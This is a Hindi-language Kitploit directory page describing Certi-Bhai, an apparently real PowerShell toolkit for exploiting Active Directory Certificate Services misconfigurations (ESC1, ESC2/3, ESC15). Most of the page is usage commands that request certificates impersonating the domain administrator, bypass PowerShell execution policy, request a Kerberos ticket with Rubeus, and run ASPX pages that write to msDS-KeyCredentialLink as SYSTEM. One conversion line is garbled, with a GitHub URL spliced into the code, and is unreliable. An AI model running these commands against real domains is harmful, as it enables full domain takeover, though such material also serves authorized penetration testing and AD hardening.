Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Certi-Bhai — यहाँ AD CS शोषण से संबंधित सामग्री दी गई है | Kitploit
उपकरण/GitHubGitHub/incredibleindishell/certi-bhai
विशेषाधिकार वृद्धिपेलोड जनरेशनशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणरेड टीमिंग
GitHubincredibleindishell/certi-bhai

Certi-Bhai

यहाँ AD CS शोषण से संबंधित सामग्री दी गई है

रिपॉजिटरी देखें
26255 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Certi-Bhai: AD CS एक्सप्लॉइटेशन टूलकिट

Certi-Bhai एक्टिव डायरेक्टरी सर्टिफिकेट सर्विसेज (AD CS) कमजोरियों पर हमला करने के लिए PowerShell एक्सप्लॉइटेशन टूल्स का एक व्यापक संग्रह है। यह टूलकिट विभिन्न एस्केलेशन सिनेरियो (ESC) लागू करता है जो ADCS वातावरण में महत्वपूर्ण सुरक्षा गलत कॉन्फ़िगरेशन प्रदर्शित करते हैं।

📋 विषय-सूची

  • अवलोकन
  • निर्देशिका संरचना
  • पूर्वापेक्षाएँ
  • उपयोग गाइड
    • ESC1 - अत्यधिक अनुमत सर्टिफिकेट टेम्पलेट
    • ESC2/3 - सर्टिफिकेट अनुरोध एजेंट
    • ESC15 - कमजोर वेब एनरोलमेंट
    • CSR जनरेशन
    • IIS विशेषाधिकार एस्केलेशन

🎯 अवलोकन

एक्टिव डायरेक्टरी सर्टिफिकेट सर्विसेज (AD CS) अक्सर गलत कॉन्फ़िगर किया जाता है, जिससे कई हमले के वेक्टर बनते हैं। Certi-Bhai सामान्य ADCS कमजोरियों के सुरक्षा परीक्षण और अनुसंधान के लिए व्यावहारिक एक्सप्लॉइटेशन स्क्रिप्ट और उपयोगिताएँ प्रदान करता है।

केवल अधिकृत परीक्षण वातावरण में जिम्मेदारी से उपयोग करें।


✅ पूर्वापेक्षाएँ

  • Windows 7 / Windows Server 2008 या बाद का संस्करण
  • PowerShell 3.0+
  • एक्टिव डायरेक्टरी डोमेन से जुड़ा सिस्टम
  • सर्टिफिकेट अनुरोध करने के लिए उपयुक्त अनुमतियाँ
  • AD CS इंफ्रास्ट्रक्चर तक पहुंच
  • .NET Framework 3.5+ (ASP.NET स्क्रिप्ट के लिए)

आवश्यक मॉड्यूल

root@kitploit:~
# एक्टिव डायरेक्टरी मॉड्यूल (वैकल्पिक, बेहतर कार्यक्षमता के लिए)
Import-Module ActiveDirectory

🚀 उपयोग गाइड

ESC1: अत्यधिक अनुमत सर्टिफिकेट टेम्पलेट

कमजोरी: सर्टिफिकेट टेम्पलेट मनमाने SubjectAltName (SAN) मानों के साथ एनरोलमेंट की अनुमति देते हैं।

यह क्या करता है: अत्यधिक अनुमत टेम्पलेट द्वारा हस्ताक्षरित सर्टिफिकेट बनाता है, जिससे आप डोमेन में किसी भी उपयोगकर्ता या कंप्यूटर की पहचान कर सकते हैं।

उपयोग:

root@kitploit:~
# ESC1 निर्देशिका पर जाएं
cd ESC1

# एक्सप्लॉइटेशन स्क्रिप्ट चलाएं
.
\esc1.ps1 -subjectName "CN=administrator,CN=Users,DC=indishell,DC=lab" `
           -templateName "vuln" `
           -altName "administrator" `
           -pfxPass "password123"

पैरामीटर:

  • -subjectName: लक्षित उपयोगकर्ता का पूर्ण विशिष्ट नाम (DN)
  • -templateName: कमजोर सर्टिफिकेट टेम्पलेट का नाम
  • -altName: अनुरोध करने के लिए वैकल्पिक नाम (उपयोगकर्ता/कंप्यूटर)
  • -pfxPass: PFX निर्यात के लिए पासवर्ड

आउटपुट: Rubeus जैसे टूल्स के साथ उपयोग के लिए Base64-एन्कोडेड PFX सर्टिफिकेट

वीडियो ट्यूटोरियल: https://www.youtube.com/watch?v=l0gMw_mO4dw


ESC2/3: किसी भी उद्देश्य/सर्टिफिकेट अनुरोध एजेंट दुरुपयोग

कमजोरी: सर्टिफिकेट अनुरोध एजेंट किसी भी उपयोगकर्ता की ओर से सर्टिफिकेट अनुरोध कर सकते हैं।

यह क्या करता है: सर्टिफिकेट अनुरोध एजेंट के रूप में सर्टिफिकेट एनरोल करता है, फिर मनमाने प्रिंसिपलों के लिए सर्टिफिकेट अनुरोध करता है।

उपयोग:

root@kitploit:~
# ESC3 निर्देशिका पर जाएं
cd ESC3

# एक्सप्लॉइटेशन स्क्रिप्ट चलाएं
.
\esc3_working.ps1 -templateName "CEOTemplate" `
                   -target_user "administrator" `
                   -domain "INDISHELL" `
                   -pfxPass "password123"

पैरामीटर:

  • -templateName: कमजोर अनुरोध एजेंट टेम्पलेट
  • -target_user: सर्टिफिकेट अनुरोध करने के लिए प्रिंसिपल
  • -domain: डोमेन नाम
  • -pfxPass: PFX पासवर्ड

आउटपुट: base64 एन्कोडिंग के साथ एडमिनिस्ट्रेटर सर्टिफिकेट (PFX)

वीडियो ट्यूटोरियल: https://www.youtube.com/watch?v=fGjrM-JKnoM


ESC15: गलत कॉन्फ़िगर किया गया स्कीमा संस्करण 1 टेम्पलेट

कमजोरी: एप्लिकेशन पॉलिसी इंजेक्शन।


CSR जनरेशन और प्रबंधन

त्वरित CSR जनरेशन

root@kitploit:~
cd CSR_Generate

# सर्टिफिकेट साइनिंग अनुरोध जनरेट करें
.
\csr_short.ps1 -subjectName "CN=admin,CN=Users,DC=domain,DC=local" `
                -altName "admin"

सर्टिफिकेट अथॉरिटी को CSR सबमिट करें

root@kitploit:~
# CA को CSR सबमिट करें
.
\csr_submit.ps1 -csr $csr `
                 -templateName "User" `
                 -caServer "ca-server.domain.local"

IIS विशेषाधिकार एस्केलेशन

सर्टिफिकेट प्रबंधन इंटरफेस

cert.aspx वेब इंटरफेस AD CS RPC एंडपॉइंट से सर्टिफिकेट अनुरोध करने के लिए उपयोगकर्ता-अनुकूल फॉर्म प्रदान करता है:

root@kitploit:~
http://your-iis-server/cert.aspx

LDAP अपडेट इंटरफेस

वेब इंटरफेस के माध्यम से LDAP विशेषताओं को संशोधित करें। यह स्क्रिप्ट मूल रूप से msDS-KeyCredentialLink विशेषता में ब्लॉब इंजेक्ट करने के लिए उपयोग की जाती है:

root@kitploit:~
http://your-iis-server/ldap_update.aspx

विशेषताएँ:

  • LDAP विशेषता फ़िल्टरिंग
  • ऑब्जेक्ट संशोधन क्षमताएँ
  • NT Authority\SYSTEM संदर्भ निष्पादन

त्वरित संदर्भ कमांड

ESC1 एक्सप्लॉइटेशन के लिए

root@kitploit:~
.
\ESC1/esc1.ps1 -subjectName "CN=admin,CN=Users,DC=indishell,DC=lab" `
                -templateName "User" `
                -altName "administrator" `
                -pfxPass "P@ssw0rd!"

ESC2/3 पोस्ट-एक्सप्लॉइटेशन के लिए

root@kitploit:~
# Rubeus के लिए PFX को उपयोग योग्य प्रारूप में बदलें
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2("cert.pfx", "password")
[Convert]:https://raw.githubusercontent.com/incredibleindishell/certi-bhai/main/:ToBase64String($cert.RawData)

Rubeus के साथ TGT अनुरोध करें

root@kitploit:~
Rubeus.exe asktgt /user:administrator /certificate:$base64cert /nowrap

🔧 समस्या निवारण

सामान्य समस्याएँ

प्रश्न: स्क्रिप्ट निष्पादन अवरुद्ध है

root@kitploit:~
# PowerShell को एडमिनिस्ट्रेटर के रूप में चलाएं
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process

प्रश्न: सर्टिफिकेट टेम्पलेट नहीं मिला

  • सत्यापित करें कि टेम्पलेट नाम सही है
  • सुनिश्चित करें कि आपके पास टेम्पलेट से अनुरोध करने की अनुमतियाँ हैं
  • सर्टिफिकेट अथॉरिटी लॉग जांचें

प्रश्न: LDAP कनेक्शन विफल हो जाता है

  • डोमेन कनेक्टिविटी सत्यापित करें
  • क्रेडेंशियल जांचें
  • ADSI एक्सेस की पुष्टि करें

📝 तकनीकी विवरण

सर्टिफिकेट अनुरोध प्रक्रिया

  1. निजी कुंजी जनरेट करें (2048-बिट RSA)
  2. सर्टिफिकेट अनुरोध बनाएं (PKCS#10)
  3. विषय नाम और एक्सटेंशन सेट करें
  4. सर्टिफिकेट अथॉरिटी को सबमिट करें
  5. जारी किया गया सर्टिफिकेट प्राप्त करें
  6. पासवर्ड के साथ PFX के रूप में निर्यात करें

🤝 योगदान

कोई समस्या मिली या सुधार के सुझाव हैं? कृपया जिम्मेदारी से रिपोर्ट करें।


टूल डाउनलोड करें